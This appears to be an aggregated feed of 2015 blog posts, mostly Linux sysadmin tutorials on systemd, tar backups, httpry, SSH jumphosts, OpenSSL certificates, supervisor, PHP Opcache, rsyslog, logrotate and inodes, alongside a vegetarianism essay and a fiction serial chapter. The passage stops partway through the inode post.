Like stopping a service, you can start a service with systemctl start.

$ systemctl start httpd

Again, no output, unless something went wrong. Use systemctl status to check the status of your service.

If you made an error in your service configuration, you get output like this.

$ systemctl start httpd
Job for httpd.service failed. See 'systemctl status httpd.service' and 'journalctl -xn' for details.

To see why the service failed to start, check the specific service logs. Systemd also has a way to output the info, but I find it cumbersome and sometimes lacking info -- the kind of info that's logged in additional error logs from the particular service.

$ systemctl status httpd
Aug 08 20:57:38 ma httpd[29986]: AH00526: Syntax error on line 14 of /etc/httpd/conf.d/something.conf:
Aug 08 20:57:38 ma httpd[29986]: Invalid command 'syntax', perhaps misspelled or defined by a module not included in the server configuration

If you get an error, fix it and try to start your service again.

by Mattias Geniar at August 08, 2015 07:00 PM

Enable or Disable Service At Boot on CentOS 7

This post will show you how to enable or disable a service to start on boot, on a RHEL or CentOS 7.

Check if the service starts on boot

You manage your services on RHEL/CentOS 7 through systemctl, the systemd service manager.

To check if a service starts on boot, run the systemctl status command on your service and check for the "Loaded" line.

$ systemctl status httpd
httpd.service - The Apache HTTP Server
   Loaded: loaded (/usr/lib/systemd/system/httpd.service; enabled)

The last word, either enabled or disabled, will tell you if the service starts on boot. In the case above, the Apache2 webserver "httpd", it's Enabled.

Disabling a service on boot in CentOS 7

To disable, it's simply a matter of running systemctl disable on the desired service.

$ systemctl disable httpd
rm '/etc/systemd/system/'

$ systemctl status httpd
httpd.service - The Apache HTTP Server
   Loaded: loaded (/usr/lib/systemd/system/httpd.service; disabled)

Running systemctl disable removes the symlink to the service in /etc/systemd/system/*. From now on, that service won't start on boot anymore.

Enabling a service on boot in CentOS 7

Very similar to disabling a service, you run systemctl enable on the target service.

$ systemctl enable httpd
ln -s '/usr/lib/systemd/system/httpd.service' '/etc/systemd/system/'

$ systemctl status httpd
httpd.service - The Apache HTTP Server
   Loaded: loaded (/usr/lib/systemd/system/httpd.service; enabled)

The same symlink that was removed in the disable command above is recreated if you enable a service to start on boot.

Check which services failed to start on boot on CentOS 7

As a bonus, systemctl allows you to list all services that failed to start on boot, even though they were configured to start on boot.

$ systemctl --failed
kdump.service   loaded failed failed Crash recovery kernel arming
php-fpm.service loaded failed failed The PHP FastCGI Process Manager

LOAD   = Reflects whether the unit definition was properly loaded.
ACTIVE = The high-level unit activation state, i.e. generalization of SUB.
SUB    = The low-level unit activation state, values depend on unit type.

In the example above, the kdump and php-fpm service failed to start on boot. If that's the case, you may want to check the startup scripts or its dependencies (maybe they depend on another service being up first?).

by Mattias Geniar at August 08, 2015 06:40 PM

Wouter Verhelst

Backing up with tar

The tape archiver, better known as tar, is one of the older backup programs in existence.

It's not very good at automated incremental backups (for which bacula is a good choice), but it can be useful for "let's take a quick snapshot of the current system" type of situations.

As I'm preparing to head off to debconf tomorrow, I'm taking a backup of my n-1 laptop (which still contains some data that I don't want to lose) so it can be reinstalled and used by the Debconf video team. While I could use a "proper" backup system, running tar to a large hard disk is much easier.

By default, however, tar won't preserve everything, so it is usually a good idea to add some extra options. This is what I'm running currently:

sudo tar cvpaSf player.local:carillon.tgz --rmt-command=/usr/sbin/rmt --one-file-system /

which breaks down to: c (create a tar archive), v (verbose output), p (preserve permissions), a (automatically determine compression based on the file extension), S (handle sparse files efficiently), f player.local:carillon.tgz (write to a file on a remote host, using /usr/sbin/rmt as the rmt program), --one-file-system (don't descend into separate filesystems, since I don't want /proc and /sys etc. to be backed up), and / (back up my root partition).

Since I don't believe there's any value to separate file systems on a laptop, this will back up the entire contents of my n-1 laptop to the carillon.tgz in my home directory on player.local.
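Those flags are easy to rehearse locally before trusting them with a real backup; the paths below are throwaway examples:

```shell
# Build a tiny tree and archive it with the same c/p/a/S flags (no remote rmt part)
mkdir -p demo/etc
echo 'hello' > demo/etc/motd
tar cpaSf demo.tgz demo        # 'a' selects gzip because of the .tgz extension

# Restore into another directory; p preserves the recorded permissions
mkdir -p restore
tar xpf demo.tgz -C restore
cat restore/demo/etc/motd      # prints: hello
```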

August 08, 2015 08:45 AM

August 07, 2015

Frank Goossens

Why Autoptimize doesn’t touch non-local CSS/JS

Earlier today I got this question on the support forum for Autoptimize;

Will there be Google fonts support in the future? I now include the google font’s like this:

wp_enqueue_style( 'google-fonts', '//,600italic,400,700,600|Varela+Round' );

Is it possible to add this css to the combined and minified by this plugin file?

The basic question if Autoptimize can aggregate external resources has been asked before and I felt it was time to dig in.

I did a little test, requesting the same Google Font CSS, changing browser user agents. For my good ole Firefox on Ubuntu Linux I got (snippet);
@font-face {
font-family: 'Open Sans';
font-style: normal;
font-weight: 400;
src: local('Open Sans'), local('OpenSans'), url( format('woff2'), url( format('woff');

Whereas the exact same request with an MSIE7 useragent gives (again, extract);
@font-face {
font-family: 'Open Sans';
font-style: normal;
font-weight: 400;
src: url(;

It’s not surprising Google serves specific CSS based on the browser useragent (probably browser version), but this is a simple example of how dynamic remote CSS or JS can be (the range of variables that could lead to 3rd parties serving up different CSS/JS is huge, really).

So although theoretically it would be possible to have AO cache remote JS/CSS (such as Google Fonts) and include it in the aggregated CSS or JS file (thereby removing render-blocking resources), the problem is that AO will never be able to apply whatever logic the 3rd party applies when handling requests. Hence the design decision (made by the original developer, Turl, a long long time ago) not to aggregate & minify external resources. This is how it should be.

by frank at August 07, 2015 04:50 PM

August 06, 2015

Mattias Geniar

Monitor All HTTP Requests (like TCPdump) On a Linux Server with httpry

Wouldn't it be really cool if you could run a tool like tcpdump and see all HTTP requests flowing over the network, in a readable form?

Because let's be honest, something like this is far from readable.

$ tcpdump -i eth0 port 80 -A
20:56:08.793822 IP > Flags [S], seq 1641176060, win 65535, options [mss 1460,nop,wscale 5,nop,nop,TS val 1225415667 ecr 0,sackOK,eol], length 0

It tells you that something is flowing over the wire, but you sure as hell can't read what is going over it. You recognise keywords, but that's it.

There are tools out there that do a better job, like httpry.

It's been around long enough to be present in most repositories on Linux servers by now. Install it via your package manager of choice.

$ yum install httpry
$ apt-get install httpry

After you have it installed, you can run it on your server and sniff for HTTP calls.

$ httpry -i eth0
>  HEAD  /  HTTP/1.1  -    -
<  -     -            -  HTTP/1.1  301  Moved Permanently

The output above is the result of the following HTTP call.

$ curl -I -H "Host:"

It did a HEAD request (-I) and got a 301 HTTP redirect back.

Want to see how many HTTP requests are flowing through per second and which vhost is the most active? Start httpry with the -s parameter.

$ httpry -i eth0 -s
2015-08-06 21:06:56	19 rps
2015-08-06 21:06:56	61 rps
2015-08-06 21:06:56	totals	30.69 rps
2015-08-06 21:07:01	21 rps
2015-08-06 21:07:01	56 rps
2015-08-06 21:07:01	totals	32.41 rps

Every 5 seconds, the output shows the requests made in that last interval. It shows the Host: headers used in that request and the amount of requests that were received.

While it doesn't work on HTTPS requests, it is a useful tool to have in your arsenal.

by Mattias Geniar at August 06, 2015 07:10 PM

How To Use A Jumphost in your SSH Client Configurations

Jumphosts are used as intermediate hops between yourself and your actual SSH target. Instead of using something like insecure SSH agent forwarding, you can use ProxyCommand to proxy all your commands through your jumphost.

Using SSH Jumphosts

Consider the following scenario.


You want to connect to HOST B and have to go through HOST A, because of firewalling, routing, access privileges, ... There are a number of legit reasons why jumphosts are needed, not just preferred.

Classic SSH Jumphost configuration

A configuration like this will allow you to proxy through HOST A.

$ cat .ssh/config

Host host-a
  User your_username

Host host_b
  User your_username
  Port 22
  ProxyCommand ssh -q -W %h:%p host-a

Now if you want to connect to your HOST B, all you have to type is ssh host_b, which will first connect to host-a in the background (that's the ProxyCommand being executed) and start the SSH session to your actual target.

SSH Jumphost configuration with netcat (nc)

Alternatively, if you can't/don't want to use ssh to tunnel your connections, you can also use nc (netcat).

$ cat .ssh/config

Host host-a
  User your_username

Host host_b
  User your_username
  Port 22
  ProxyCommand ssh host-a nc -w 120 %h %p

This has the same effect.

Sudo in ProxyCommands

If netcat is not available to you as a regular user, because permissions are limited, you can prefix your ProxyCommands with sudo. The SSH configuration essentially allows you to run any command on your intermediate host, as long as you have the privileges to do so.

$ cat .ssh/config

  ProxyCommand ssh host-a sudo nc -w 120 %h %p

ProxyCommand options allow you to configure SSH as you like, including jumphost configurations like these.
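If your client is OpenSSH 7.3 or newer, the same jump can also be expressed with the ProxyJump option, without a hand-written ProxyCommand (host names as in the examples above):

```
Host host_b
  User your_username
  Port 22
  ProxyJump host-a
```

A one-off equivalent on the command line is ssh -J host-a host_b.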

by Mattias Geniar at August 06, 2015 06:50 PM

How To Create A Self-Signed SSL Certificate With OpenSSL

Creating a self-signed SSL certificate isn't difficult with OpenSSL. These kinds of SSL certificates are perfect for testing, development environments or anything else that requires SSL, but that doesn't necessarily need a trusted SSL certificate.

If you use this in an Nginx or Apache configuration, your visitors will see a big red "Your connection is not private" warning message first, before they can browse through. This isn't for production, just for testing.

To generate a self-signed SSL certificate in a single openssl command, run the following in your terminal.

$ openssl req -x509 -sha256 -newkey rsa:2048 -keyout certificate.key -out certificate.crt -days 1024 -nodes

You'll be prompted for several questions; the only one that really matters is the Common Name, which will be used as the hostname/DNS name the self-signed SSL certificate is made for. (Although: even with a valid Common Name, it's still a self-signed SSL certificate and browsers will still consider it untrusted.)

Here's the output of that command.

$ openssl req -x509 -sha256 -newkey rsa:2048 -keyout certificate.key -out certificate.crt -days 1024 -nodes

Generating a 2048 bit RSA private key
writing new private key to 'certificate.key'
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
Country Name (2 letter code) [AU]:BE
State or Province Name (full name) [Some-State]:Antwerp
Locality Name (eg, city) []:Antwerp
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Some Organization Ltd
Organizational Unit Name (eg, section) []:IT Department
Common Name (e.g. server FQDN or YOUR name) []: your.domain.tld
Email Address []:info@yourdomain.tld

If you don't want to fill in those questions every time, you can run a single command with the Common Name as a command line argument. It'll generate the self-signed SSL certificate for you straight away, without pestering you for questions like Country Name, Organization, ...

$ openssl req -x509 -sha256 -newkey rsa:2048 -keyout certificate.key -out certificate.crt -days 1024 -nodes -subj '/CN=my.domain.tld'

Generating a 2048 bit RSA private key
writing new private key to 'certificate.key'

The result with both openssl commands will be 2 new files in your current working directory.

$ ls -alh
-rw-r--r--   1 mattias  1.7K  certificate.crt
-rw-r--r--   1 mattias  1.6K  certificate.key

You can use the certificate.key as the key for your SSL configurations. It doesn't have a password associated with it, that's what the -nodes (No DES encryption) option was for when running the openssl command. If you want a password on your private key, remove that option and run the openssl command again.

$ cat certificate.key

The certificate.crt contains your certificate file, the "public" part of your certificate.

$ cat certificate.crt

Now you have a self-signed SSL certificate and a private key you can use for your server configurations.
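If you want to double-check the result, openssl can print the certificate back out; for a self-signed certificate the subject and issuer are identical. The CN below is just a placeholder:

```shell
# Generate a throwaway cert non-interactively, then inspect it
openssl req -x509 -sha256 -newkey rsa:2048 -keyout test.key -out test.crt \
    -days 30 -nodes -subj '/CN=test.local' 2>/dev/null

# Both lines show CN = test.local: subject == issuer means self-signed
openssl x509 -in test.crt -noout -subject -issuer
```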

by Mattias Geniar at August 06, 2015 05:30 PM

August 05, 2015

Mattias Geniar

supervisor job: spawnerr: can’t find command ‘something’

I love supervisor, an easy to use process controller on Linux. It allows you to configure a process that should always run, similar to god (ruby).

Sometimes though, supervisor isn't happy. It can throw the following error in your stderr logs.

2015-08-05 15:50:25,311 INFO supervisord started with pid 16450
2015-08-05 15:50:26,312 INFO spawnerr: can't find command './my-worker'
2015-08-05 15:50:27,315 INFO spawnerr: can't find command './my-worker'
2015-08-05 15:50:29,318 INFO spawnerr: can't find command './my-worker'
2015-08-05 15:50:32,322 INFO spawnerr: can't find command './my-worker'
2015-08-05 15:50:32,322 INFO gave up: my-worker entered FATAL state, too many start retries too quickly

Well that's annoying.

The supervisor config looked decent enough though, nothing wrong to be seen here.

$ cat /etc/supervisor.d/my_worker.ini

It was supposed to su - to the user defined in the config and run the ./my-worker from its $HOME directory. However, that's not what happens.

When supervisor executes something as a different user, it doesn't modify the $PATH variable. In fact, it's mentioned clearly on the configuration documentation.

[program:x] Section Values
If it is relative, the supervisord’s environment $PATH will be searched for the executable.

The tool I wanted to run wasn't in supervisor's $PATH though.

To fix this, it's just a matter of making all commands in your configurations use absolute paths -- instead of relative paths. Configure the full path in the command= config parameter, and supervisor will happily start your configuration.

This'll work:

$ cat /etc/supervisor.d/my_worker.ini
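The config body didn't survive in this copy of the post; a version with the fix applied could look like this (program name, user and paths are placeholders for whatever your setup uses):

```ini
[program:my-worker]
; absolute path -- supervisord's $PATH is not your shell's $PATH
command=/home/worker/my-worker
directory=/home/worker
user=worker
autostart=true
autorestart=true
```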

Hope it helps you one day too!

by Mattias Geniar at August 05, 2015 08:45 PM

How To Clear PHP’s Opcache

PHP can be configured to store precompiled bytecode in shared memory, called Opcache. It prevents the loading and parsing of PHP scripts on every request. This guide will tell you how to flush that bytecode Opcache, should you need it.

You may want to flush the APC (PHP < 5.5) or Opcache (PHP >= 5.5) in PHP when it has cached code you want to refresh. As of PHP 5.5, the APC cache has been replaced by Opcache and APC only exists as a user key/value cache, no longer a bytecode cache.

Determine your PHP method

You can run PHP in multiple ways. The last few years, PHP has evolved into new methods, ranging from CGI to FastCGI to mod_php and PHP-FPM. Flushing your Opcache depends on how you run PHP.

If you want a uniform way of flushing your Opcache, you can create a PHP file called flush_cache.php in your docroot with content like this.
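The file body was lost in this copy of the post; all it needs to do is call opcache_reset(), so a minimal version can be written out like this (filename as mentioned above):

```shell
# Create a one-line cache-flush script in the docroot
cat > flush_cache.php <<'EOF'
<?php opcache_reset(); ?>
EOF
```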


Every time you want to flush your Opcache, you can browse to that file and it'll call opcache_reset(); for your entire Opcache. The next PHP request to your site will populate the cache again.

It's important that you call that URL in the same way you would reach your website, either via a HTTP:// or HTTPS:// URL. Running php flush_cache.php at the command line won't flush the cache of your running processes.

This can be part of your deployment process, where after each deploy you curl that particular URL.

If you want a server-side solution, check further.

PHP running as CGI or FastCGI

Flushing the Opcache on CGI or FastCGI PHP is super simple: it can't be done.

Not because you can't flush the cache, but because the cache is flushed on every request anyway. FastCGI starts a new php-cgi process on every request and does not have a parent PHP process to store the Opcache results in.

In fact, having Opcache running in a CGI or FastCGI model would hurt performance: on every request the Opcache is stored in the FastCGI process (the default behaviour if the Opcache extension is activated), but that cache is destroyed as soon as that process dies after finishing the request.

Storing the Opcache takes a few CPU cycles and is an effort that cannot be benefited from again later.

CGI or FastCGI is about the worst possible way to run your PHP code.

PHP running at the CLI

All PHP you run at the command line has no Opcache. It can be enabled, and PHP can attempt to store its Opcache in memory, but as soon as your CLI command ends, the cache is gone as well.

To clear the Opcache on CLI, just restart your PHP command. It's usually as simple as CTRL+C to abort the command and start it again.

For the same reason as running PHP as CGI or FastCGI above, having Opcache enabled for CLI requests would hurt performance more than you would gain benefits from it.

Apache running as mod_php

If you run Apache, you can run PHP by embedding a module inside your Apache webserver. By default, PHP is executed as the same user your Apache webserver is running.

To flush the Opcache in a mod_php scenario, you can either reload or restart your Apache webserver.

$ service httpd reload
$ apachectl graceful

A reload should be sufficient as it will clear the Opcache in PHP. A restart will also work, but is more invasive as it kills all active HTTP connections.

PHP running as PHP-FPM

If you run your PHP as PHP-FPM, you can send a reload to your PHP-FPM daemon. The reload will flush the Opcache and force it to be rebuilt on the first incoming request.

$ service php-fpm reload

If you are running multiple PHP-FPM masters, you can reload a single master to only reset that master's Opcache. By default, it will flush the entire cache, no matter how many websites you have running.

If you want more control at the command line, you can use a tool like cachetool that can connect to your PHP-FPM socket and send it commands, the same way a webserver would.

First, download the phar that you can use to manipulate the cache.

$ curl -sO

Next, use that phar to send commands to your PHP-FPM daemon.

$ php cachetool.phar opcache:reset --fcgi=
$ php cachetool.phar opcache:reset --fcgi=/var/run/php5-fpm.sock

Using something like cachetool can also be easily integrated in your automated deploy process.

by Mattias Geniar at August 05, 2015 05:30 PM

August 04, 2015

Mattias Geniar

How To Take a Screenshot on Your Apple Watch

Taking a screenshot on your Apple Watch is just as easy as taking a screenshot on your phone: hold down the only 2 buttons available on the device at the same time.


Click the scroll wheel ("digital crown") and the contacts button simultaneously. The watch will make an audible sound, take a screenshot and then sync it to your iPhone's Photo library in a few seconds.

To access the screenshot, just navigate to your Photos and by the time you get there, the screenshot will have synced there.

Wondering if you should get one? Read my Apple Watch review to find out.

by Mattias Geniar at August 04, 2015 09:24 PM

Rsyslog Configuration with Dynamic Log File Destination Based On Program Name

I wanted to create a configuration using the default rsyslog tool on RHEL/CentOS, that would dynamically store log files depending on the "program name" that performs the logs.

Disclaimer: this is not a safe configuration. Anyone can pretend to be any program on a Linux box with syslog, so you can't trust the data 100%. But it's a nice little separator for having multiple applications run, each with its own identity.

To create dynamic logfiles, based on the $programname variable in rsyslog, you first have to define a dynamic destination template.

~$ cat /etc/rsyslog.d/custom_logging.conf

$template CUSTOM_LOGS,"/var/log/%programname%.log"

Once you have such a dynamic template, you can begin to redirect syslogs there that match a certain pattern. In this case, I want to send every application that begins with the letter "n", and have each application write to its own log.

~$ cat /etc/rsyslog.d/custom_logging.conf

if $programname startswith 'n' then ?CUSTOM_LOGS
& ~

The & ~ line isn't a closing tag: the & applies a second action to the previous filter, and the ~ action discards the matched message, so it isn't processed by any further rules.

Alternatively, you can match a specific programname as well.

~$ cat /etc/rsyslog.d/custom_logging.conf

if $programname == 'my_custom_app' then ?CUSTOM_LOGS
& ~

To tie it all together, if you want to have dynamic logs based on the application name, make an rsyslog config that looks like this.

~$ cat /etc/rsyslog.d/custom_logging.conf

# Template the destination file
$template CUSTOM_LOGS,"/var/log/%programname%.log"

# Match anything that starts with the letter "n" and
# rewrite it to /var/log/$programname.log
if $programname startswith 'n' then ?CUSTOM_LOGS
& ~

To test the configuration, use the logger tool and pass along arguments to tag your messages. These tags are interpreted by rsyslog as the $programname variable used in the examples above.

$ logger -t n_application1 "this gets written to log 'n_application1' "
$ logger -t myapp "this gets written to log 'myapp' "

For more information on the rsyslog filtering options, have a look at the rsyslog v5 filter documentation (default on CentOS/RHEL) or the latest rsylog v8 filter documentation.

It's mostly REGEX based.

If you want to do more advanced logging, you're probably better off investigating tools like syslog-ng or logstash.

by Mattias Geniar at August 04, 2015 09:17 PM

Logrotate On RHEL/CentOS 7 Complains About Insecure Permissions on Parent Directory, World Writable

Since Logrotate 3.8, which is default on Red Hat Enterprise Linux and CentOS 7, the parent permissions on your log directories play a vital role in whether or not logrotate will be able/willing to process your logs.

If your permissions allow writes by a group that isn't root, you may see the following error when logrotate tries to run.

$ logrotate /etc/logrotate.d/something

error: skipping "/var/www/vhosts/site.tld/logs/access.log" because parent directory has insecure permissions (It's world writable or writable by group which is not "root") Set "su" directive in config file to tell logrotate which user/group should be used for rotation.

error: skipping "/var/www/vhosts/site.tld/logs/error.log" because parent directory has insecure permissions (It's world writable or writable by group which is not "root") Set "su" directive in config file to tell logrotate which user/group should be used for rotation.

A default logrotate config like the following can cause that problem.

$ cat /etc/logrotate.d/something

/var/www/vhosts/site.tld/logs/access.log {
  create 0640 site_user httpd
  postrotate
    /sbin/service httpd reload > /dev/null 2>/dev/null || true
  endscript
}

It has the create statement, to recreate the logs with correct ownership/permissions, but that's not sufficient for logrotate.

To resolve this problem, and have logrotate work properly again, you also have to add the su $user $group configuration. This causes logrotate to actually su - to that user and execute all logrotate actions as that user.

$ cat /etc/logrotate.d/something

/var/www/vhosts/site.tld/logs/access.log {
  create 0640 site_user httpd
  su site_user httpd
  postrotate
    /sbin/service httpd reload > /dev/null 2>/dev/null || true
  endscript
}

By adding su site_user httpd (matching the create config) in the example above, logrotate can again process logs whose parent directories have group permissions that allow groups other than root to write to them.


by Mattias Geniar at August 04, 2015 08:59 PM

Frank Goossens

Music from Our Tube; Eska’s Shades of Blue

Lovely summery tune by a great singer (whom I mentioned here a couple of years ago already); Eska with Shades of Blue;

YouTube Video
Watch this video on YouTube or on Easy Youtube.

While perusing related videos I came across this heart-warming quirky live in-the-barn version of “Gate Keeper” from back in 2012, and in that same barn Lianne La Havas covered Little Dragon’s ‘Twice’ accompanied by nothing but a truly superb bass. Who knew barns could be so cool? ;-)

by frank at August 04, 2015 09:21 AM

Lionel Dricot

The bullfighting paradox


Within a few hours, one man became the most hated person on social media for killing a lion for his own pleasure. Meanwhile, Europe was moved by the “traditional” slaughter of dolphins in the Faroe Islands.

From our collective emotional conscience, a consensus seems to emerge that it is unworthy of a human being to slaughter conscious animals for mere pleasure. Sometimes killing isn’t even necessary: making the animal suffer is quite enough to draw the wrath of the entire world. Judging by our collective reaction, it even seems more serious than the death of human beings.

This is what I call “the bullfighting paradox”, because it seems harder and harder to find justifications for bullfighting, whose one and only purpose is to entertain by making animals suffer and killing them.

But why is it a paradox?

Quite simply because, through our diet, we endorse systems of suffering and death out of all proportion to a hunting party or to planting banderillas in a bull. The meat industry has become the industrialisation of the suffering of animals such as the cow, the very same species as the bull we defend so fiercely when we fight bullfighting!

Yet today it is perfectly possible to eat an entirely vegetarian diet. Vegetarian food not only generates less suffering, it is also far more ecological and, as a rule, more balanced and better for your health. Killing animals is no longer necessary for our survival.

But while we are quick to take offence over a lion, a dolphin or a bull, we cannot give up industrially slaughtering, in atrocious suffering, extremely intelligent and likeable animals such as the cow, the pig or the chicken.

The reason?

Because it’s just too tasty! Because I couldn’t do without meat. Because I’m a carnivore, it’s a tradition. Because I’m passionate about traditional gastronomy.

The only arguments justifying the suffering and the slaughter are thus pure, selfish personal pleasure and tradition. Is there any difference with hunting, the dolphin slaughter or bullfighting?

No, but you don’t understand. I can’t live without a delicious hamburger.

And Walter Palmer can’t live without the adrenaline rush that chasing an animal gives him. Where is the moral difference? What’s more, you can find alternatives to your pleasure that he doesn’t have, alternatives that will soon be perfect.

This hypocrisy is so deeply rooted that it even affects the best-informed people. Freedivers, for instance, are traditionally great defenders of the marine environment, saviours of sharks and other endangered species. Yet those same people love underwater spearfishing. For sport. With this meagre moral justification:

Yes, but I eat everything I catch!

In times of famine and caloric deficit, that argument would be perfectly acceptable. But in a society where we eat too much, where vegetarian food is available in every supermarket, deliberately killing and potentially unbalancing an extremely fragile ecosystem is not morally coherent for anyone who claims to defend ecology and animal life.

Because, after all, they are “only” fish. For some obscure reason, the fact that these animals swim makes fish a sub-animal species that can be tortured and exploited at will; restaurants don’t hesitate to offer fish or seafood in vegetarian dishes, notwithstanding the fact that fishing, in any form, is an ecological disaster, and that most endangered species are endangered in our oceans because of fishing.

Before attacking the dentist Walter Palmer and the toreadors, we should rather scrutinise our own behaviour and look at our own plates.

In fact, we are even worse than a Walter Palmer! Because of waste and overconsumption, we industrially slaughter animals only to throw their meat straight in the bin, without it providing the slightest pleasure!

It is of course possible to adopt a so-called “speciesist” morality: animals are inferior to humans, and humans owe them nothing and may treat them as they please. Just like racism a few decades ago, speciesism is morally rational and can form an arbitrarily coherent system, provided you accept its consequences: an animal is an animal, and there is no getting emotional about an animal, be it fish, cow, cat or lion.

But if the images of bloodied animals serving as trophies and entertainment do not leave you indifferent, if you think Walter Palmer’s act was barbaric, if the photos of a sea reddened by dolphins’ blood grab you by the throat, then perhaps you are not a true speciesist. So how can you act concretely to change the world? Simple: stop killing animals for your pleasure, even if you eat them, and reduce, even symbolically, your consumption of meat and fish.

A simple, gradual gesture that, even if it is only one meal a week, will do far more for the planet and the animals than all the petitions and Facebook likes in the world.


Photo by Chema Concellón.

Thanks for taking the time to read this freely paid post. Feel free to support me with a few milliBitcoins or a handful of euros, or by following me on Tipeee, Twitter, Google+ and Facebook!

This text is published by Lionel Dricot under the CC-By BE licence.

Flattr this!

by Lionel Dricot at August 04, 2015 08:13 AM

August 03, 2015

Lionel Dricot

Printeurs 35

This is post 35 of 35 in the Printeurs series.

Nellio, Junior and Eva have climbed into intertube capsules taking them to the mysterious coordinates sent by Max.


The workings of the human mind are impenetrable. While my body is uncomfortably compressed in a cramped space with barely enough air to breathe, I can’t help philosophising.

How to explain that this part of the intertube is already operational, when the very definition of a government project usually implies a considerable delay?

The answer requires a certain mental journey. Apart from getting elected, the role of the politicians who make up the government is to make public money evaporate as fast as possible.

Of course, these days there is no question of direct embezzlement. The risk of getting caught and convicted would be far too great. A minimum of subtlety has become necessary.

As soon as a bit of public money is available, a politician will spend it in the way that optimises his visibility on the networks. Inaugurating the very first intertube link seems, on that score, an excellent idea. But the most important thing is certainly to legally pocket a percentage of that spending. And what could be easier than financing major works, an intertube link for example, using as an overpaid contractor a company in which you are a shareholder? Or one that will hire you as a consultant after your well-earned political retirement?

The fact that I’m being jolted around in this intertube therefore means that somewhere nearby there is a politician at the end of his career emptying the coffers. By announcing an intertube station, he will leave behind the image of a visionary, enterprising manager. His successor, on the other hand, will inherit the unpopularity of a catastrophic budget situation.

As I’m swept along at hundreds of kilometres per hour in absolute darkness, I can’t help feeling indignant. How has our system of government become so corrupt?

But in the end, does it even matter any more? Elections are experienced as entertainment, halfway between sports competitions and the series so dear to the télé-pass holders. Private police stations impose their own rules and nobody really pays attention any more to the laws politicians debate, laws that in any case regulate fields in which they are completely incompetent. We settle for paying them a tax with the sole hope that they will leave us alone. Those taxes finance an administration that now runs in a closed circuit: the various ministries work for one another in total disconnection from the rest of the world.

In the airtight darkness of my projectile coffin, the absurdity of our society suddenly strikes me like lightning. I feel as if I am discovering the world, as if I were a newborn, an extraterrestrial.

In an automated world, work no longer adds value but, on the contrary, inefficiency. From a quality it becomes a defect. Without a change of economic paradigm, value is no longer created, it dissipates. The only way to get rich is therefore to become an evaporation point yourself. Either by collecting value and claiming to redistribute it in the name of the public good, which is what politics does, or by convincing the public to buy some good or service from you, however useless it may be.

It is thus no longer a matter of being useful, but of convincing the world that you are. Appearance has taken precedence over essence, giving birth to advertising! Advertising! The central link! That is why I had never taken the necessary step back. Advertising formats us, keeps us from concentrating. Its omnipresence turns the brain into a mere receiver. It took this cure without contact lenses and this sensory isolation for my neurons to finally start working again.

Against this model of society, the printeur represents the ultimate threat. By laying bare the uselessness of most current jobs, the printeur will push workers to question the usefulness of everyone, including their leaders. The moral rigidity that makes télé-pass holders pariahs, sub-humans, slackers, is only possible as long as they are a minority and as long as they are still given hope, the hope of one day being useful. If that hope disappears, if competition between them no longer has any reason to exist, if the majority of the population becomes télé-pass…

I shiver. Never before had I considered the societal consequences of the printeur. Georges Farreck’s motivations now seem less obscure to me: after all, despite his wealth and fame, he has never been anything but a pawn, an advertising tool, a luxury sandwich-board man. Printeurs would inevitably have been invented and will, whatever happens, end up upending the social order. Might as well be on the right side…


A shock! I half knock myself out against the wall of my container before realising that all vibration, all change of direction has ceased. I must have arrived at my destination.

Pushing the hatch open, I extricate myself and set foot in a short, well-lit corridor. Not the slightest trace of Eva, who should nevertheless have arrived before me. She can only have gone through that shiny red door. Everything is incredibly clean. The air carries that characteristic smell of new buildings.

A noise. Junior has just arrived. I open the hatch of his capsule and am immediately greeted by a scream. He is covered in blood and clutching his right hand, moaning.
– My fingers! My fingers!
While hoisting him onto the corridor floor, I examine his wound. The fingers of his right hand have all been cut clean off at the metacarpals. I shudder in horror. He made the whole journey in the dark, screaming and covered in his own blood!
— What happened?
— The departure was too fast, I didn’t have time to pull my hand back.
Tearing off a piece of my t-shirt, I make him a makeshift bandage.
— Bloody useless biological body! None of this would have happened with an avatar. And I won’t even be able to type on a keyboard any more!
— Don’t you have a pill on you that could work as a painkiller?
— In my right pocket… Some tiroflan… Argh, it hurts!
Searching his trousers, I immediately take out two orange capsules and make him swallow them.

His breathing slows, becomes more spaced out.
– Come on! We have to find a way to treat this a bit better.

Grabbing him by the waist, I help him walk and we head for the red door. As we approach, it opens automatically, without the slightest sound.

The room we find ourselves in is filled with electronic measuring equipment and computer screens. I start and almost cry out in fright. On a table lies Eva, completely naked, eyes wide open, her gaze empty. She isn’t making the slightest movement.

Standing between her legs, a man in white overalls, his trousers around his ankles, is conscientiously raping her.


Photo by Glen Scott.

Thanks for taking the time to read this freely paid post. Feel free to support me with a few milliBitcoins or a handful of euros, or by following me on Tipeee, Twitter, Google+ and Facebook!

This text is published by Lionel Dricot under the CC-By BE licence.

Flattr this!

by Lionel Dricot at August 03, 2015 02:24 PM

August 02, 2015

Mattias Geniar

How To Increase Amount of Disk inodes in Linux

The post How To Increase Amount of Disk inodes in Linux appeared first on

It doesn't happen often, but at times you may run out of inodes on a Linux system.

To find your current inode usage, run df -i.

$ df -i
Filesystem                Inodes   IUsed     IFree  IUse%   Mounted on
/dev/mapper/centos-root 19374080   19374080  0      100%   /

Of the 19,374,080 available inodes, none were free. This is pretty much the equivalent of a disk full, except it doesn't show in terms of capacity but in terms of inodes.

If you're confused on what an inode exactly is, Wikipedia has a good description.

In a Unix-style file system, an index node, informally referred to as an inode, is a data structure used to represent a filesystem object, which can be one of various things including a file or a directory. Each inode stores the attributes and disk block location(s) of the filesystem object's data.
Wikipedia: inode

A disk with 0 available inodes is probably full of very small files, somewhere in a specific directory (applications, tmp-files, pid files, session files, ...). Each file uses (at least) 1 inode. Many million files would use many million inodes.

If your disks' inodes are full, how do you increase it? The tricky answer is, you probably can't.

The number of inodes available on a filesystem is decided when the partition is created. For instance, a default EXT3/EXT4 partition has a bytes-per-inode ratio of one inode for every 16384 bytes (16 KB).

A 10GB partition would have around 622,592 inodes. A 100GB partition has around 5,976,883 inodes (taking into account the reserved space for super-users/journalling).

Do you want to increase the amount of inodes? Either increase the capacity of the disk entirely (Guide: Increase A VMware Disk Size (VMDK) LVM), or re-format the disk using mkfs.ext4 -i to manually overwrite the bytes-per-inode ratio.
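As a back-of-the-envelope sketch of that ratio (naive math that ignores journalling and reserved space, which is why the real mkfs numbers above come out somewhat lower; the device name in the comment is a placeholder):

```shell
# One inode per 16384 bytes is the ext3/ext4 default ratio.
BYTES_PER_INODE=16384
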